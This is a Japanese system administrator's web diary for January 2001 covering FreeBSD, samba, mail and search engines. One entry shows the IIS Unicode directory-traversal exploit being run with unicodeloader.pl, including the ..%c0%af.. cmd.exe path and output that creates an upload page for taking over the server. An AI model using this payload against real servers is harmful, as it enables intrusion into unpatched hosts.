2001年01月06日()<< 前の日記 | 次の日記 >>
この日の詳細

■1久々に日記次の記事 >> このエントリーをはてなブックマークに追加

本当にひさしぶりに日記を書いてみる。 書き方忘れていたりして。
本年もよろしくお願いします。

■ 関連記事

■2ログ読み[goo]<< 前の記事 このエントリーをはてなブックマークに追加

久しぶりにRefererログをしっかり読んだり。 「会社+バレない+アルバイト」なんてのは、会社から読んでちゃ駄目です。
「ニンニラ+カツライス」はどこに引っかかったのか謎。おいしそうです。

■ 関連記事

詳細はこの日の詳細から

2001年01月09日(火)<< 前の日記 | 次の日記 >>
この日の詳細

■1 ポストカプセル2001[http://www.mpt.go.jp/pressrelease/japanese/yubin/000727j201.html] このエントリーをはてなブックマークに追加

残念ながら、知り合いあたりで届いたという話は聞かない。 専用封筒には興味あったんだけどな。

■ 関連記事

詳細はこの日の詳細から

2001年01月10日(水)<< 前の日記 | 次の日記 >>
この日の詳細

■1ひさびさにぐる次の記事 >> このエントリーをはてなブックマークに追加

久しぶりに日記を書いたら、ログに反応があったのでぐるぐる。

世間は・・・[http://catv-8-110.medias.ne.jp:10080/~takayuki/diary/?200101a&to=200101022#200101022]:

狭いので注意が必要。インターネットが普及してさらに狭くなりました。
  • 仕事関係の話をWeb日記に書いてて関係者に見つかる
  • 仕事関係のドキュメントを公開されたサーバに置いててURL公開していないのにRefererあたりで特にライバル関係に見つかる
  • Web日記のディレクトリから上の階層に見られちゃいやんなモノを置いてて、筆者とのつながりが発覚
ってのも良くある話なので注意。

■ 関連記事

■2PalmPilot<< 前の記事 このエントリーをはてなブックマークに追加

あるいはその手の携帯情報端末が欲しいのですが、何を買ったらいいでしょう。
  • 電池持ちは気にしたくない。
  • PCとの同期が大事。スケジュール帖をたくさん持つのは危険。
  • たくさん入力するときはPCでやればいい
  • ハッカー魂をくすぐる何かが欲しい
と思うと,やっぱりPalmかなと思うのですが。実際のところ,どうなのでしょうか。

■ 関連記事

詳細はこの日の詳細から

2001年01月12日(金)<< 前の日記 | 次の日記 >>
この日の詳細

■1 英Tripod[http://www.tripod.co.uk/] このエントリーをはてなブックマークに追加

どうも経路情報がおかしいらしい。 ping届きます?

■ 関連記事

詳細はこの日の詳細から

2001年01月13日()<< 前の日記 | 次の日記 >>
この日の詳細

■1 マウンテンのページ[http://www.kissa.mountain.spn.co.jp/] このエントリーをはてなブックマークに追加

たぽの日記[http://catv-8-110.medias.ne.jp:10080/~takayuki/diary/?200101b&to=200101131#200101131] から。
懐かしいですねぇ。ページで見れるようになるとは思わんかった。

■ 関連記事

詳細はこの日の詳細から

2001年01月14日()<< 前の日記 | 次の日記 >>
この日の詳細

■1メッセージ[hns] このエントリーをはてなブックマークに追加

読者からのメッセージを読むのを忘れていました。 知らない間にメッセージ頂いていて恐縮です。
以前は,メールに送る設定にしていたと思うのだけど, 恐らくバージョンアップか何かのときに設定を元に戻してしまったのでしょう。

■ 関連記事

詳細はこの日の詳細から

2001年01月17日(水)<< 前の日記 | 次の日記 >>
この日の詳細

■1 インパク音頭[http://plaza14.mbn.or.jp/~momoi/inpaku/]次の記事 >> このエントリーをはてなブックマークに追加

■ 関連記事

■2そういえば雪<< 前の記事 このエントリーをはてなブックマークに追加

昨日,一昨日とものすごい(34年ぶりとかいう)大雪が降ったらしい。
一昨日の夕方くらいにすごい降り方をしだしたので, いつかは買っておこうと思っていたチェーンを買ったのが正解。 昨日の朝にはどこの店に行っても品切れ状態だったらしい。
この辺りでは,チェーン必要になるのは年に1回位しかないそうだけど, この手の「備えあれば憂いなし」ものが,買ってすぐに役に立つことは珍しいので, とりあえず1回使ってモトを取った気分。

■ 関連記事

詳細はこの日の詳細から

2001年01月18日(木)<< 前の日記 | 次の日記 >>
この日の詳細

■1 PPP over ssh[http://www.nantoka.com/~kei/diary/?200005c&to=200005295#T200005295]次の記事 >> このエントリーをはてなブックマークに追加

某所からサービスとして提供してもらえないかという相談を受けた。
今後もきちんとやるなら料金考えないといけないのだけれども, 顧客管理の手間まで考えると月額3千円を切るのは難しいだろう。
一方,利用者としてはNATの下だろうがなんだろうが既に接続にお金を払っている上に, 月額3千円なりの負担をしてグローバルIPが欲しい人は少ないだろう。 このあたり,別契約でグローバルIPがもらえるシステムのところの差額を参考にすると良さそう。
いずれにせよ,需要はそんなに見込めないし,ビジネスにするのは無理かな。 もともとスケールメリットが出そうな話ではないので,100契約位でペイすれば良しとして, やるとすれば,ホスティングやメールのセカンダリ,接続が切れているときに代理応答するページのホスティング あたりまで絡めて付加価値を付ければ,なんとかなるのかも知れない。

■ 関連記事

■2 ipfw+amanda+freebsd+firewall[http://www.google.com/search?q=ipfw+amanda+freebsd+firewall&hl=en&lr=&safe=off&start=20&sa=N][goo]<< 前の記事 このエントリーをはてなブックマークに追加

googleより。
ウチしか引っかからないらしい。結構,濃い話題かも知れず。 ファイヤウォールの内側から外側のマシンをdumpしてるのだけれども, きちんとやろうと思ったら,Amandaのconfigureの時に細工しないとだめです。 AMANDA FAQ[http://amanda.sourceforge.net/fom-serve/cache/139.html] 参照。
もう一層外側のルータで適切にフィルタリングしてやれば,そこまでやる必要もないですが。

■ 関連記事

詳細はこの日の詳細から

2001年01月19日(金)<< 前の日記 | 次の日記 >>
この日の詳細

■1 続・PPP over ssh[http://www.nantoka.com/~kei/diary/?200101b&to=200101181#T200101181] このエントリーをはてなブックマークに追加

今なら, VTun[http://vtun.sourceforge.net/] の方がお手軽で良いかも知れない。
日本語なら, このあたり[http://home.jp.FreeBSD.ORG/cgi-bin/showmail/FreeBSD-users-jp/52259] のスレッドが参考になります。
デフォルトのPort 5000じゃなくて,Port 80で待ち受けるとかすると嬉しい人が多いのだろうか。

■ 関連記事

詳細はこの日の詳細から

2001年01月22日(月)<< 前の日記 | 次の日記 >>
この日の詳細

■1 Google[http://www.google.com/intl/ja/] このエントリーをはてなブックマークに追加

今までは、サイト検索には goo[http://www.goo.ne.jp/] を使っていましたが、 Google[http://www.google.com/intl/ja/] 良いです。
「I'm Feeling Lucky」もかなりの精度で驚きます。

■ 関連記事

詳細はこの日の詳細から

2001年01月23日(火)<< 前の日記 | 次の日記 >>
この日の詳細

■1 sambaでのファイルロック[http://catv-8-110.medias.ne.jp:10080/~takayuki/diary/?200101c&to=200101222#200101222][freebsd]次の記事 >> このエントリーをはてなブックマークに追加

sambaでのファイルロック絡みの問題には, これ[http://www.samba.gr.jp/project/translation/release/tech/File-Cacheing.txt] が効くみたいです。
ウチでも同じような問題が発生して,この設定入れてからは発生していないところをみると, 問題の原因は同じなような気がします。

■ 関連記事

■2 コンピュータジョーク[http://hp.vector.co.jp/authors/VA000092/jokes/index.html][CLIP]<< 前の記事 | 次の記事 >> このエントリーをはてなブックマークに追加

ブックマークしようとしてたのに見つけ出せなかったのだけど,やっと発見。
ウチとこの会社では, squidのキャッシュに入っているデータは検索可能[http://www.nantoka.com/~kei/diary/?200006a&to=200006082S2#T200006082S2] にしてあるので,社員の誰かが苦労して見つけたページはみんなで共有できるシステムになっております。
プライバシ問題との兼ね合いもありますが,職場で見るページは仕事のための情報収集という前提であれば, 効率の向上に役立つと思われます。

■ 関連記事

■3ProjectP終了[おしごと]<< 前の記事 | 次の記事 >> このエントリーをはてなブックマークに追加

とりあえず納品。改修の対応の準備をすすめなきゃだけど,とりあえずは一段落。

■ 関連記事

■4load average[freebsd]<< 前の記事 このエントリーをはてなブックマークに追加

預かってるサーバのMRTGを見ていたら,1日に数回,load averageが極端に高くなっている時間帯が発生している。 数分間から1時間程度の様だが,ログからは原因を追いきれなかったので, ちょっとしたスクリプト *1 を書いてcrontabに仕込んでおくことにした。
*1: /usr/bin/wして,0.8を超えていたら,/usr/bin/w -d とps auxlをファイルに書き出す。

■ 関連記事

詳細はこの日の詳細から

2001年01月24日(水)<< 前の日記 | 次の日記 >>
この日の詳細

■1 squidのcacheをnamazuで検索[http://mylab.ike.tottori-u.ac.jp/~mijosxi/1999/12_sqnmz.html][CLIP]次の記事 >> このエントリーをはてなブックマークに追加

逆リンクを辿っていたら, やぎさんとこ[http://www.entrance.ne.jp/~yagi/diary/?20010124#24-1]mknmz-squid[http://src.presen.to/src/index.html] が紹介されているのを見つけた。
このあたりがWeb日記のありがたさですね。

■ 関連記事

■2メールの署名<< 前の記事 このエントリーをはてなブックマークに追加

メールの署名は、/^-- $/なる正規表現で表される行で はじめることってRFCがあった気がしたので探す。grepすればすぐだな。 今度探そう。ローカルルール?

■ 関連記事

詳細はこの日の詳細から

2001年01月25日(木)<< 前の日記 | 次の日記 >>
この日の詳細

■1 メールの署名[http://www.nantoka.com/~kei/diary/?200101c&to=200101242#T200101242]次の記事 >> このエントリーをはてなブックマークに追加

調べるより前にメッセージを頂きました。TNXです。 シグネチャーの書式については, RFC2646[ftp://ftp.isi.edu/in-notes/rfc2646.txt] に「The Text/Plain Format Parameter」として触れられているようです。
ここ[http://yar-3.net/d/?20000712&to=200007121#200007121] とか ここ[http://saba.three-a.co.jp/~toku/diary/?2000071#200007121S2] で何度か話題に上っているので,FAQかも知れません。

■ 関連記事

■2 POP before SMTP[http://www.nantoka.com/~kei/diary/?200011a&to=200011032#T200011032][freebsd]<< 前の記事 このエントリーをはてなブックマークに追加

共用サーバうさ1号にPOPauthを導入。 今まで,ダイヤルアップ先のプロバイダのメールサーバを使って欲しいとアナウンスしていたのだけど, プロバイダによっては,FROM行を使ってTPRチェックをやってるところがあるらしく, うまく行かない場合が出てきた。
本当は,FROM行でチェックするのは危険だからやめたほうが良くて *1 ,そのプロバイダも設定を見直すべきなんだけど,とりあえずユーザさんは困るのでPOP before SMTPで対応。
今までなんとなくPOP before SMTPはどうも場当たり的な対応で乗り気ではなかったのですが, ユーザさんから見ると利便性高いですよね。
おまけで、FreeBSDのportsから入れる時用の パッチ[/~kei/dist/patch-pbs] を置いときます。無保証。
*1: FROM行をfakeされた場合はアウトだし,fakeされた場合の方が人的被害が大きい。

■ 関連記事

詳細はこの日の詳細から

2001年01月26日(金)<< 前の日記 | 次の日記 >>
この日の詳細

■1 shell on IIS server with Unicode using *only* HTTP[http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Ffromthread%3D0%26threads%3D0%26end%3D2001-01-27%26list%3D1%26mid%3D158336%26start%3D2001-01-21%26][セキュリティ]次の記事 >> このエントリーをはてなブックマークに追加

セキュリティホール memo[http://www.st.ryukoku.ac.jp/~kjm/security/memo/2001/01.html#20010125_iis] から。
この忙しいのに,パッチあてなきゃいけないお客さんがいるなぁ。 早く,FreeBSDに移行させねば。

実験してみた。:

パッチをあてていないサイトだと,
kei@xxxxx[205] ./unicodeloader.pl www.XXXXX.co.jp:80 'c:\InetPub\wwwroot'


Creating uploading webpage on www.XXXXX.co.jp on port 80.
The webroot is c:\InetPub\wwwroot.

testing directory /scripts/..%c0%af../winnt/system32/cmd.exe?/c
farmer brown directory: C:\Inetpub\scripts
sensepost.exe not found - lets copy it quick
uploading ASP section:
..............
uploading the INC section: (this may take a while)
................................................................................
................................................................................
........................
upload page created.

Now simply surf to www.XXXXX.co.jp/upload.asp and enjoy.
Files will be uploaded to c:\InetPub\wwwroot
なんて具合にいとも簡単に乗っ取れてしまいます。 後は,怪しいツールをインストールするなりページを書き換えるなりご自由にの状態になります。 wwwrootの物理位置を知る必要があるとは言っても, 多くのサイトはc:\InetPub\wwwrootでしょうから,ほとんど障壁になりません。 これはまずいな。

■ 関連記事

■2業界人脈半径は2hop<< 前の記事 このエントリーをはてなブックマークに追加

らしい。某MLで離れて久しい知人と会ってびっくり。 お互い業界(どの?)にいるとはいえ,もともと参加者そう多くも無いMLなので, やっぱり驚くですよ。
実はディープなユーザ密度が高いのかな [http://www.jp.freebsd.org/ml.html#isp-jp]

■ 関連記事

詳細はこの日の詳細から

2001年01月27日()<< 前の日記 | 次の日記 >>
この日の詳細

■1namazuの活用法[TIPS]次の記事 >> このエントリーをはてなブックマークに追加

規模の大きい文書を作成するときに,用語を統一するのは結構大変な作業です。 一人で書いている分にはさほど揺らぎませんが,チームで作業をすると, ところどころでミスが出ます。
例えば,
  • ソフトウェア/ソフトウェアー
  • サーバ/サーバー
  • アーキテクチャ/アーキテクチャー
等の表記については,事前に用語集をまとめておいて, それをみんなで参照しながら作業をしますが, それでも変換ミスや用語集に載せていない単語で表記の不一致が発生するわけです。
こういうシーンでもnamazuが活躍します。
mknmz -c -O nmz --allow '.*\.tex' TeX/
とかやって作った,NMZ.wを活用しましょう。
メンバ
モード
モジュール
モデム
モデル
モニタ
ユーザ
ユーザー
みたいなリストができあがるので,確認が楽になります。 分かち書きにはChasenを使うのがコツです。

■ 関連記事

■2referer分析[セキュリティ]<< 前の記事 | 次の記事 >> このエントリーをはてなブックマークに追加

セキュリティのカテゴリーに入れたのは,広い意味ではこれもセキュリティだということで。 自分のサイトのrefererはセキュリティの面からも積極的にチェックすべきですというお話。
リンク元からは批判的,もっと言って中傷する文脈でリンクされている可能性もあるからです。
例えば,新商品の紹介に不備があった,表現に問題があった等という場合に, 掲示板等で話題にされているかも知れませんし, 全くの虚偽の話をでっち上げてリンクしてある可能性もあります。
悪事千里を走ると言いますが,悪い評判の方が流布しやすいのは事実の様です。 実際,サーバ管理者の立場からすると,アクセス数の極端な急増は, トラフィックやサーバ負荷を抜きにしても,悪い知らせのことが多い気がします。
もちろん,ネガティブなことばかりではなく,自分のサイトにどこから来たのかを分析することは, 自社のサイトに何が求められているかを分析することになり,コンテンツの充実につながります。 この際は検索キーワードの分析も一緒にやると良いと思います。
#!/usr/bin/perl

while (<>) {
        s/%([0-9a-fA-F][0-9a-fA-F])/pack("C", hex($1))/ge;
        print $_;
}
って感じ。

■ 関連記事

■3 I'm Feeling Lucky[http://www.google.com/search?q=%83T%81%5B%83o%8A%C7%97%9D%8E%D2%93%FA%8E%8F&btnG=Google+%8C%9F%8D%F5&hl=ja&lr=lang_ja][goo]<< 前の記事 | 次の記事 >> このエントリーをはてなブックマークに追加

で出てくると嬉しい。

■ 関連記事

■4 マイラインとフレッツISDN、テレホーダイとの関係について[http://ohta.oresama.org/myline/][CLIP]<< 前の記事 このエントリーをはてなブックマークに追加

とても良くまとまっています。

■ 関連記事

詳細はこの日の詳細から

2001年01月28日()<< 前の日記 | 次の日記 >>
この日の詳細

■1i-system[hns]次の記事 >> このエントリーをはてなブックマークに追加

i-system経由で日記が読めなくなったみたい。 2000/01/10[http://www.nantoka.com/~kei/diary/i/?20010110] あたりから,本文が表示されないですね。 変なタグ使ったかな。

■ 関連記事

■2MRTGの様なもの<< 前の記事 このエントリーをはてなブックマークに追加

こんなのあるといいなぁと思ったら,作れの啓示かも知れない。
時系列にグラフ化されたMRTGみたいな物があると思ってください。 クリックすると拡大できたり,関連するログを閲覧できるというのがあると嬉しい。
ディスク容量はそれなりに食うと思うけど。

■ 関連記事

詳細はこの日の詳細から

2001年01月30日(火)<< 前の日記 | 次の日記 >>
この日の詳細

■1 goo?[http://www.goo.co.jp/][goo] このエントリーをはてなブックマークに追加

客先にサポートに行ったら,「最近、gooで検索しようとするといきなりエロサイトにつながる」 というトラブル。
知っている人はピンと来るかも知れませんが原因は,
  • 新種のウイルスがIEのブックマークを書き換える
  • DNSの乗っ取りで、外部からDNSキャッシュにニセのエントリを食わせてトラフィックを誘導する
  • VBScriptによる細工で,あるサイトを訪れると,以降CommandButtonをクリックすると特定サイトに誘導される
  • DNSサーバが乗っ取られていて,でたらめなアドレスを返してくる
のいずれでもありません。平和。

■ 関連記事

詳細はこの日の詳細から

2001年01月31日(水)<< 前の日記 | 次の日記 >>
この日の詳細

■1 光通信[http://www.hikari.co.jp/] このエントリーをはてなブックマークに追加

クラック? 裏ニュース![http://www.uranews.com/] から。
幸か不幸か、クラックされた画面を生で見たのははじめてです。
kei@nantoka[227] telnet www.hikari.co.jp 80
Trying 202.214.131.1...
Connected to www.hikari.co.jp.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Wed, 31 Jan 2001 15:13:29 GMT
Server: Apache/1.3.12 (Unix)  (Red Hat/Linux) PHP/3.0.15 mod_perl/1.21
Last-Modified: Wed, 31 Jan 2001 10:10:39 GMT
ETag: "57880-63b-3a77e49f"
Accept-Ranges: bytes
Content-Length: 1595
Connection: close
Content-Type: text/html

Connection closed by foreign host.
ってことで、こいつを信用すればRed Hatみたいですね。 ページの書き換えができるということは、少なくともhttpuserの権限は 手に入れている訳で、これを踏み台にして余所に侵入していくというのも可能でしょう。
良く考えてみたら、この間のIISのセキュリティーホールって自己増殖型のウイルスに 発展させることって非常に簡単なんでは。
実際に作ってみようかと思ったりもしたけど、万一外部に漏れ出すとお手手が後ろに回るし、 その心配が無いようなサンドボックス作るのは大変なので、手を出さない方が良さそう。

■ 関連記事

詳細はこの日の詳細から

以上、18 日分です。

指定日の日記を表示

前月 2001年01月 翌月
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30 31

最近の日記

2019年04月01日

新元号「令和」について

2019年03月23日

DXアンテナ ワイヤレスチューナー メディアコンセント DMC10F1

2019年02月17日

#例のグラボを活用する

2019年01月03日

シリーズ5・myHomeAlexaで自分のCDをかける

2018年12月25日

シリーズ4・英語の楽曲・アルバム・アーティスト名をカタカナに直す

2018年12月23日

シリーズ3: Echo Dotがやってきた

2018年12月19日

続・Echo Dotがやってきた

分野別タイトル一覧


全て
CLIP
SYA!nikki
book
freebsd
hns
magic
おさけ
おしごと
お買いもの
ぐる
ごはん
アクセシビリティ
オープンソース
セキュリティ
音楽
地域情報化
電子自治体
日記

keikuma on Twitter

keikuma Name:前田勝之
Location:長崎市
Web:http://www.nantok...
Bio:前田勝之(まえだかつゆき)。長崎在住。コンサル、SE、プログラマー、 なんとか株式会社代表、非常勤講師(情報セキュリティ)。 セキュアド、テクニカルエンジニア(SV,NW)。サーバ管理とWeb日記を10年ほど。 ネットとリアルの接点に関心あり。食べること・歌うこと・愛すること・作ること・飲むこと。おいしいものがぜんぶすき。

サイト内検索

Google AdSense

Powered by hns-2.19.9, HyperNikkiSystem Project